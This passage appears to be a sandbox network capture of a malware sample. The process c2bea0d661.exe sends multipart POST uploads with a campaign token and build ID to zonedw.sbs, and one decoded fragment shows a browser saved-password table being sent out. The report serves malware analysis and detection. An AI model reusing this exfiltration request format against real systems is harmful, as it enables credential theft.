AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-13 17:54:09 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-13 17:54:09 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-13 17:54:09 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-13 17:54:09 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-13 17:54:09 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-13 17:54:09 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-13 17:54:09 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-13 17:54:09 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-13 17:54:11 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 13 Dec 2024 17:54:11 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.7	49982	116.203.10.31	443	4876	C:\Users\user\AppData\Local\Temp\1014879001\c2bea0d661.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-13 17:54:10 UTC	324	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----4EKFCJWBIMO8QIWL6F3O User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0 Host: zonedw.sbs Content-Length: 55081 Connection: Keep-Alive Cache-Control: no-cache
2024-12-13 17:54:10 UTC	16355	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 34 45 4b 46 43 4a 57 42 49 4d 4f 38 51 49 57 4c 36 46 33 4f 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 66 31 31 39 64 33 66 65 31 37 65 66 38 62 31 64 38 31 32 63 63 32 30 36 32 64 32 34 35 30 30 0d 0a 2d 2d 2d 2d 2d 2d 34 45 4b 46 43 4a 57 42 49 4d 4f 38 51 49 57 4c 36 46 33 4f 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 34 31 31 63 66 36 32 62 63 62 61 30 34 64 37 34 66 63 36 62 35 30 35 62 39 32 33 35 34 30 34 0d 0a 2d 2d 2d 2d 2d 2d 34 45 4b 46 43 4a 57 42 49 4d 4f 38 51 49 57 4c 36 46 33 4f 0d 0a 43 6f 6e 74 Data Ascii: ------4EKFCJWBIMO8QIWL6F3OContent-Disposition: form-data; name="token"df119d3fe17ef8b1d812cc2062d24500------4EKFCJWBIMO8QIWL6F3OContent-Disposition: form-data; name="build_id"e411cf62bcba04d74fc6b505b9235404------4EKFCJWBIMO8QIWL6F3OCont
2024-12-13 17:54:10 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-13 17:54:10 UTC	16355	OUT	Data Raw: 32 68 68 63 6d 6c 75 5a 31 39 75 62 33 52 70 5a 6d 6c 6a 59 58 52 70 62 32 35 66 5a 47 6c 7a 63 47 78 68 65 57 56 6b 49 45 6c 4f 56 45 56 48 52 56 49 67 54 6b 39 55 49 45 35 56 54 45 77 67 52 45 56 47 51 56 56 4d 56 43 41 77 4c 43 42 72 5a 58 6c 6a 61 47 46 70 62 6c 39 70 5a 47 56 75 64 47 6c 6d 61 57 56 79 49 45 4a 4d 54 30 49 73 49 46 56 4f 53 56 46 56 52 53 41 6f 62 33 4a 70 5a 32 6c 75 58 33 56 79 62 43 77 67 64 58 4e 6c 63 6d 35 68 62 57 56 66 5a 57 78 6c 62 57 56 75 64 43 77 67 64 58 4e 6c 63 6d 35 68 62 57 56 66 64 6d 46 73 64 57 55 73 49 48 42 68 63 33 4e 33 62 33 4a 6b 58 32 56 73 5a 57 31 6c 62 6e 51 73 49 48 4e 70 5a 32 35 76 62 6c 39 79 5a 57 46 73 62 53 6b 70 42 2f 67 41 4c 51 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: 2hhcmluZ19ub3RpZmljYXRpb25fZGlzcGxheWVkIElOVEVHRVIgTk9UIE5VTEwgREVGQVVMVCAwLCBrZXljaGFpbl9pZGVudGlmaWVyIEJMT0IsIFVOSVFVRSAob3JpZ2luX3VybCwgdXNlcm5hbWVfZWxlbWVudCwgdXNlcm5hbWVfdmFsdWUsIHBhc3N3b3JkX2VsZW1lbnQsIHNpZ25vbl9yZWFsbSkpB/gALQAAAAAAAAAAAAAAAAAAAAAA
2024-12-13 17:54:10 UTC	6016	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-13 17:54:12 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 13 Dec 2024 17:54:12 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-12-13 17:54:12 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.7	49990	116.203.10.31	443	4876	C:\Users\user\AppData\Local\Temp\1014879001\c2bea0d661.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-13 17:54:14 UTC	322	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----MG4WTRQQIMOZUAIEK6PP User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0 Host: zonedw.sbs Content-Length: 493 Connection: Keep-Alive Cache-Control: no-cache
2024-12-13 17:54:14 UTC	493	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 4d 47 34 57 54 52 51 51 49 4d 4f 5a 55 41 49 45 4b 36 50 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 66 31 31 39 64 33 66 65 31 37 65 66 38 62 31 64 38 31 32 63 63 32 30 36 32 64 32 34 35 30 30 0d 0a 2d 2d 2d 2d 2d 2d 4d 47 34 57 54 52 51 51 49 4d 4f 5a 55 41 49 45 4b 36 50 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 34 31 31 63 66 36 32 62 63 62 61 30 34 64 37 34 66 63 36 62 35 30 35 62 39 32 33 35 34 30 34 0d 0a 2d 2d 2d 2d 2d 2d 4d 47 34 57 54 52 51 51 49 4d 4f 5a 55 41 49 45 4b 36 50 50 0d 0a 43 6f 6e 74 Data Ascii: ------MG4WTRQQIMOZUAIEK6PPContent-Disposition: form-data; name="token"df119d3fe17ef8b1d812cc2062d24500------MG4WTRQQIMOZUAIEK6PPContent-Disposition: form-data; name="build_id"e411cf62bcba04d74fc6b505b9235404------MG4WTRQQIMOZUAIEK6PPCont
2024-12-13 17:54:15 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 13 Dec 2024 17:54:15 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-12-13 17:54:15 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.7	49988	116.203.10.31	443	4876	C:\Users\user\AppData\Local\Temp\1014879001\c2bea0d661.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-13 17:54:14 UTC	325	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----AS2N7900ZU3EUA1VAI5F User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0 Host: zonedw.sbs Content-Length: 142457 Connection: Keep-Alive Cache-Control: no-cache
2024-12-13 17:54:14 UTC	16355	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 41 53 32 4e 37 39 30 30 5a 55 33 45 55 41 31 56 41 49 35 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 66 31 31 39 64 33 66 65 31 37 65 66 38 62 31 64 38 31 32 63 63 32 30 36 32 64 32 34 35 30 30 0d 0a 2d 2d 2d 2d 2d 2d 41 53 32 4e 37 39 30 30 5a 55 33 45 55 41 31 56 41 49 35 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 34 31 31 63 66 36 32 62 63 62 61 30 34 64 37 34 66 63 36 62 35 30 35 62 39 32 33 35 34 30 34 0d 0a 2d 2d 2d 2d 2d 2d 41 53 32 4e 37 39 30 30 5a 55 33 45 55 41 31 56 41 49 35 46 0d 0a 43 6f 6e 74 Data Ascii: ------AS2N7900ZU3EUA1VAI5FContent-Disposition: form-data; name="token"df119d3fe17ef8b1d812cc2062d24500------AS2N7900ZU3EUA1VAI5FContent-Disposition: form-data; name="build_id"e411cf62bcba04d74fc6b505b9235404------AS2N7900ZU3EUA1VAI5FCont
2024-12-13 17:54:14 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-13 17:54:14 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-13 17:54:14 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 